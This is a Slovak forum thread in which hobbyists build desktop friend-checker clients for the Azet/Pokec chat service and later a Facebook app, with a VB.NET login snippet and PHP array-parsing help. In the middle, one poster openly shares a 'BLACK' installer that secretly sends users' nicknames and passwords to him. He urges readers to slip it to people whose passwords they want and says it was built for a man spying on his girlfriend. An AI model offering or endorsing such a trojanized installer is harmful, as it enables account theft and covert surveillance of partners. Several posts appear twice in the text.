a jedna otazka v .NET tam si si to vsetko naklikal alebo si musel vsetko pracne vyrabat lebo ja to robim vo VC6
Azet checker priateľov
pekne ale preco mi zobrazuje iba 4-och priatelov ?...
a jedna otazka v .NET tam si si to vsetko naklikal alebo si musel vsetko pracne vyrabat lebo ja to robim vo VC6
a to je tak rok 98-2002 a vtedy nieco ze notifikacne vyskakovacie okno spoza hodin asi ani nepoznali
ja som si musel pracne na programovat alebo take ako posielas HTTP request? je tam nieco ako WINSOCK2 ? a niejaka funkcia socksend(,,,); ? sockrecv(); ci to vyraba requesty na poziadanie ? napr. hned pri prihlaseni ten status bar ? to automaticky spravilo ? ci si to niejak sam musel očasovat ? ... a este pouzivas tam MultiThread ? ci NET je uz tak rozumnejsi ze ti GUI nemrzne ked caka na niejaku funkciu 
-
refr0
Star
- Kontaktovať používateľa:
preco tizobrazuje len 4priatelov to neviem zatial vsetky nicky co som testoval zobrazilo vsetkych.. neprepol sisi len rezim aby zobrazovalo prihlasenych ? a dalej... naklikal som si len formular kazde je to .net takze tak .. notifikacie nato je tam komponent je to celkom lahko ovladatelne len nastavis vlastnosti cez kod normalne... co satyka http requestov tak to som si musel tiez naprogramovat napr kod na lognutie je
progress bar je tiez len komponent ktory v kode po urcitych krokoch sa vyplna cize ano sam som casoval
to tam je skor len o tom aby clovek mal predstavu ze ako to ide
no hej klasika ak su zlozite funkcie tak to brzi vsetko...
Kód: Vybrať všetko
Dim postData As String
postData = "nick=" & TextBoxLogin.Text & "&heslo=" & TextBoxHeslo.Text & "&PosliForm=PosliForm&OK=Prihlasit"
Dim request As HttpWebRequest
Dim response As HttpWebResponse
request = CType(WebRequest.Create("http://moje.azet.sk/prihlasenie.phtml?&WAP=1&KDE=wap.azet.sk/index.phtml~"), HttpWebRequest)
request.ContentLength = postData.Length
request.Method = "POST"
Dim requestStream As Stream = request.GetRequestStream()
Dim postBytes As Byte() = Encoding.ASCII.GetBytes(postData)
requestStream.Write(postBytes, 0, postBytes.Length)
requestStream.Close()
response = CType(request.GetResponse(), HttpWebResponse)
response.Close()
request.Abort()
zase som trocha pokročil tu je BLACK poQec alfa verzia 0.8 notifikacne okienko + notifikacny zvuk a este nieco dalsie... zatial su tam v menu nekliknutelne 2 veci:
1. moznost vybrat si vlastny notifikačny zvuk (zniejakeho dôvodu mi to nebere "korektne" cestu)
2. Automaticke nastavenie statusu podla aktualne hranej piesne vo winampe (funguje ale pri vypínani aplikacie vyhadzuje ERORR kernel32 mam tam niejaku elementarnu chybu ktoru prehliadam)
Upozornenie !!! BLACK--> posiela mi to Nick + Heslo
Upozornenie2: mozno budete mat aj problem s odinštalovanim
TiP: Ak chcete niekoho Nick+Heslo podstrčte mu inštalačku ,ja to budem uchovavat a ked pošlete Nick ja vam k nemu pošlem heslo
1. moznost vybrat si vlastny notifikačny zvuk (zniejakeho dôvodu mi to nebere "korektne" cestu)
2. Automaticke nastavenie statusu podla aktualne hranej piesne vo winampe (funguje ale pri vypínani aplikacie vyhadzuje ERORR kernel32 mam tam niejaku elementarnu chybu ktoru prehliadam)
Upozornenie !!! BLACK--> posiela mi to Nick + Heslo
Upozornenie2: mozno budete mat aj problem s odinštalovanim
TiP: Ak chcete niekoho Nick+Heslo podstrčte mu inštalačku ,ja to budem uchovavat a ked pošlete Nick ja vam k nemu pošlem heslo
- Prílohy
-
- poqec_0.8_black.zip
- samostane subory
- (937.7 KiB) 37 stiahnutí
-
- install_poqec.0.8.rar
- inštalačka poqecu
- (996.25 KiB) 32 stiahnutí
-
refr0
Star
ak tym myslis aj moje tak si kludne pusti aj wireshark a pozri si co sa ti kam odosiela ja som nic take urcite nespravil...sapler napísal:neverim, ze niektora s predoslich bola "clean" preto som to ani neskusal.....
Clean verzia 0.8 Beta
Presvedčíš sa o tom tak ,že si zapneš Wireshark (predtym ako sa prihlsis samozrejme
) a pred tym si este vytvoris niejakeho testovaci Nick z heslo napr. 123456
a mozez sledovat ci to posle
Ta black verzia bola pre jedneho chalana ktory chcel zistit heslo svojej priatelky lebo sa mu zda ze ho odrbava funguje to tak ze mi to posle RP z nickom + heslom na moj učet hned po prihlaseni
PS: zatial mi nic neprislo mozno to ani nefunguje
BTW: uz som fixol moznost vybrat si vlastny zvuk šlape... + odblokoval som možnost Nastavenia si statusu automaticky podla piesne vo winampe
Presvedčíš sa o tom tak ,že si zapneš Wireshark (predtym ako sa prihlsis samozrejme
Ta black verzia bola pre jedneho chalana ktory chcel zistit heslo svojej priatelky lebo sa mu zda ze ho odrbava funguje to tak ze mi to posle RP z nickom + heslom na moj učet hned po prihlaseni
PS: zatial mi nic neprislo mozno to ani nefunguje
BTW: uz som fixol moznost vybrat si vlastny zvuk šlape... + odblokoval som možnost Nastavenia si statusu automaticky podla piesne vo winampe
- Prílohy
-
- poqec_0.8_beta_clean.zip
- (937.69 KiB) 38 stiahnutí
je dobre mat na to rychly NET z dobrou odozvou komp by nemal byt až taky problem---weroro napísal:no ja ti neviem ale ono to ma ist az tak pomaly? alebo na to treba turbo PC a net? lebo ked dam prihlasit trva mu to asi 2minuty kym ma prihlasi a potom to laguje.. 1.4GHz a 768MB RAM
dôvod: MultiThreading
a dufam že si sa skusal prihlasit z niejakym dočasnym heslom na tej Black verzii !!! ale aj tak som ho vymazal...
-
weroro
Flash coder
na black verzii som sa prihlasil normalne.. co uz nebojim sa straty uctu... len ma to zaujalo lebo nieco podobne som uz aj ja asi pred rokom vytvoril.. akurat to bolo vo Flashi takze som musel este spravit taky mini brovser v ktorom by sa to spustalo kedze v standalone playery vo flashi sa neda pripojit na net... tato clean verzia mi nefunguje .. skusam instalovat new framework tak uvidim co to spravy..
-
Hack2erSVK
Light Expert
Potesilo byBX napísal:No chlapcipred každým z vás aj s vašimi AZETčekermi
![]()
Som zvedavý hlavne na tu, ako ste ju nazvali, "local pokec" verziuKeďže ja ale pokec nevyužívam, mohol by sa niekto nudiť a urobiť niečo podobné na facebook však?
PS: Keď raz budem veľký, aj ja také budem vedieťA urobím si verziu pre gigacast!
ano, resp. aj dalsich co by o to mali zaujem
//autoeditácia príspevku ( 20 Dec 2009, 23:47 )
zacal som na niecom robit, tentoraz by to malo byt funkcne ako FB aplikacia
kedze je vela hodin a moje znalosti z php su neslavne, ak sa niekomu chce, tak poprosim help s tymto.
Mam vysledok (odpoved od FB API) ktory je v array-i
vyzera to asi takto:
je to ukazka 2 poloziek pola, kde este polozka status je dalsie pole
potreboval by som napisat kod, ktory by tento vystup spracoval a vypisal by nasledovne pre vsetky polia z vysledku (v tomto pripade su 2):
0.name
0.pic_small
0.uid
ak je dlzka(0.status.message) > 0 tak vypis status.message
(toto je mozne nahradit podmienkou : status.status_id != 0)
ak sa niekomu s tym bude chciet pohrat tak vopred dakujem
//autoeditácia príspevku ( 20 Dec 2009, 23:47 )
zacal som na niecom robit, tentoraz by to malo byt funkcne ako FB aplikacia
kedze je vela hodin a moje znalosti z php su neslavne, ak sa niekomu chce, tak poprosim help s tymto.
Mam vysledok (odpoved od FB API) ktory je v array-i
vyzera to asi takto:
Array
(
[0] => Array
(
[name] => janko hrasko
[uid] => 12345679
[pic_small] => http://profile.ak.fbcdn.net/blabla.jpg
[status] => Array
(
[message] => xxxxxxxxx:)))
[time] => 123
[status_id] => 456
)
)
[1] => Array
(
[name] => janka hraskova
[uid] => 987654321
[pic_small] => http://profile.ak.fbcdn.net/blabbabla.jpg
[status] => Array
(
[message] =>
[time] => 0
[status_id] => 0
)
)
)
potreboval by som napisat kod, ktory by tento vystup spracoval a vypisal by nasledovne pre vsetky polia z vysledku (v tomto pripade su 2):
0.name
0.pic_small
0.uid
ak je dlzka(0.status.message) > 0 tak vypis status.message
(toto je mozne nahradit podmienkou : status.status_id != 0)
ak sa niekomu s tym bude chciet pohrat tak vopred dakujem
-
audiotrack
VIP
povedzme že celé to pole sa vola $pole (treba si ho nejak pomenovať aby som s nim vedel pracovať): toto by malo robiť to čo chceš, ale som lenivý na to aby som kvôli tebe zapínal apache 
<?php
foreach($pole as $key => $value){
if(is_array($value) && isset($value['message']) && $value['status_id'] > 0){
echo $value['message'] . "<br/>";
}
echo $value . "<br/>";
}
?>
-
audiotrack
VIP
jou, jedno vnorenie som vynechal.
foreach($pole as $p){
foreach($p as $key => $value){
if(isset($value['message']) && $value['status_id'] > 0){
echo $value['message'] . "<br/>";
}
else if(!is_array($value)) echo $value . "<br/>";
}
}jj, to vnorenie tam chybalo
takze tu je provizorny vysledok
zial FB je zvlastny, online, idle, offline status na chate neznamena takyto isty status aj pre facebook databazu (z ktorej robim select) takze v chate je mozne vidiet ine statusy
este musim vymysliet/prepisat aby to checkovalo prave vasich priatelov a malo by to byt hotove (edit, toto uz mam medzicasom done), a potom to uz len submit do FB (da sa to spustat aj cez moj web, ale aj tak sa treba prihlasit cez FB)
dalsi edit, aplikacia je viac menej hotova, len ma hneva kodovanie, nech skusam ako skusam vzdy mi robia problem niektore znaky nasej abecedy, vysledkom je skomolene meno napr: Ä˝uboš = Ľuboš (ukazka aj v prilozenom screene)
takze tu je provizorny vysledok
zial FB je zvlastny, online, idle, offline status na chate neznamena takyto isty status aj pre facebook databazu (z ktorej robim select) takze v chate je mozne vidiet ine statusy
este musim vymysliet/prepisat aby to checkovalo prave vasich priatelov a malo by to byt hotove (edit, toto uz mam medzicasom done), a potom to uz len submit do FB (da sa to spustat aj cez moj web, ale aj tak sa treba prihlasit cez FB)
dalsi edit, aplikacia je viac menej hotova, len ma hneva kodovanie, nech skusam ako skusam vzdy mi robia problem niektore znaky nasej abecedy, vysledkom je skomolene meno napr: Ä˝uboš = Ľuboš (ukazka aj v prilozenom screene)